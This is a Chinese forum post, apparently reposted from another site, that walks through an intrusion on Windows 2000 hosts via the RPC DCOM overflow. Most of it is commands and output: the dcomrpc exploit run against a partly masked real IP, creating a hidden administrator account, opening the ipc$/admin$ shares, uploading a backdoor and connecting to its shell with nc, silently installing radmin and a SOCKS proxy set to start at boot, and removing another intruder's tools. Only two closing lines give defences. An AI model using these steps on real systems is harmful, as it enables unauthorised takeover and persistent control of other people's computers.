• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    dcomrpc入侵

    发布者: 您的网友已离线 | 发布时间: 2025-6-27 15:24| 查看数: 84| 评论数: 0|帖子模式

    需要的工具:  
    很好的:?radmin.exe  
    扫描工具: retinarpcdcom.exe  
    溢出攻击工具:RpcDcom(通用溢出工具)  
    脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe  
    代理:sksockserver.exe  
    后门程序:WinEggDropShellPro3thVersion  好了,该做的都做的差不多了。现在开始把~~  首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必  随便扫一下就会发现有许多主机开放的135端口)。。。。。。  (人走运座着都能检到钱) 211.217.50.xx?第一个主机就被扫出来又此漏洞。开始工作  看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有  
    其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k  哈哈,是win2k server版本  
    展开命令行:  [查看dcomrpc的用法?用法 dcomrpc -d <host> [options]? ]  F:\hack>cd rpc\dcomrpc  RPC DCOM Expl01t coded by .:[oc192.us]:. Security  Complied and Modified by Expl01t www.longker.com  Usage:  dcomrpc -d <host> [options]  
    Options:  
    ? -d:????Hostname to attack [Required]  
    ? -t:????Type [Default: 0]  
    ? -r:????Return address [Default: Selected from target]  
    ? -p:????Attack port [Default: 135]  
    ? -l:????Bindshell port [Default: 666]  Types:  
    ? 0 [0x0018759f]: [Win2k-Universal]  
    ? 1 [0x0100139d]: [WinXP-Universal]  
    开始进行溢出:  
    F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0  RPC DCOM remote expl01t - .:[oc192.us]:. Security  
    Complied and recorrected by Expl01t www.longker.com  
    [ ] Resolving host..  
    [ ] Done.  
    [ ] Expl01ting....Just wait......  等到出现,说明溢出成功  
    c:\winnt\system32>  接着我们建立用户  c:\winnt\system32>net user blueye$Content$nbsp;1111 /add  
    命令成功完成。  把用户添加成超级管理员  
    c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add  
    命令成功完成。  
    看看共享开了没有,没有的话把共享开开  c:\winnt\system32>net share  
    清单是空的。  c:\winnt\system32>net share ipc$Content$nbsp;
    命令成功完成。  
    c:\winnt\system32>net share admin$Content$nbsp;
    命令成功完成。  到这里我们入侵告一段落  
    [ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接]  F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]  F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32  F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32  然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet  
    使用opentelnet.exe? 关闭开启的telnet使用resumetelnet \\ip user password  
    如果忘记开共享可以使用脚本开启telnet来开共享,用法:  
    cscript telnet.vbe ip user password null port? (null是验证方式)  F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567  F:\hack>telnet 211.217.50.xx 4567  
    省略...  连接并运行后门程序,运行后门程序命令?根目录:inject.exe -run  
    (后门使用方法和安装都在zip文件里面包含了)  后门端口123456  
    F:\hack>nc 211.217.50.xx 123456  
    ???????Welcome To WinEggDropShell Matrix Version  [Melody]#   下面安装radmin  配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章  
    radmin.reg  
    raddrv.dll  
    admdll.dll  
    r_server.exe  把这个4个文件copy c:\winnt\system32  在目录下面执行命令  
    c:\winnt\system32>r_server /s radmin.reg? -----导入注册表  c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘  c:\winnt\system32>net start r_server?----- 启动服务  
    可以开启3389的话你自己看着办把,哈哈  
    安装sock代理  
    把sksockserver.exe copy c:\winnt\system32  c:\winnt\system32>sksockserver /install?????????-----安装服务  c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改  c:\winnt\system32>sksockserver -config starttype 2????----开机自动启动  c:\winnt\system32>net start skserver??????????? ----启动服务   最后删除共享  
    net share ipc$Content$nbsp;/del  
    net share admin$Content$nbsp;/del   
    在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------NO  
    看操作? (我输入的内容)  后门连接  F:\hack>nc 211.217.50.xx 123456  
    ???????Welcome To WinEggDropShell Matrix Version  [Melody]#(pslist)  [Melody]#(pskill r_server)  [Melody]#(shell)  c:\winnt\system32>(del r_server.exe)  c:\winnt\system32>(del admdll.dll)  c:\winnt\system32>(del raddrv.dll)  
    copy你自己的上去,然后安装  省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密  码  
    等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。  完了,努力白费了。。。。。。。 -----------------------------NO  出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。  呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的  嗬嗬,去试试看吧  
    防御办法:  
    安装rpc补丁  
    使用防火墙过滤135,445,139等端口  

    来源:https://www.jb51.net/hack/5200.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表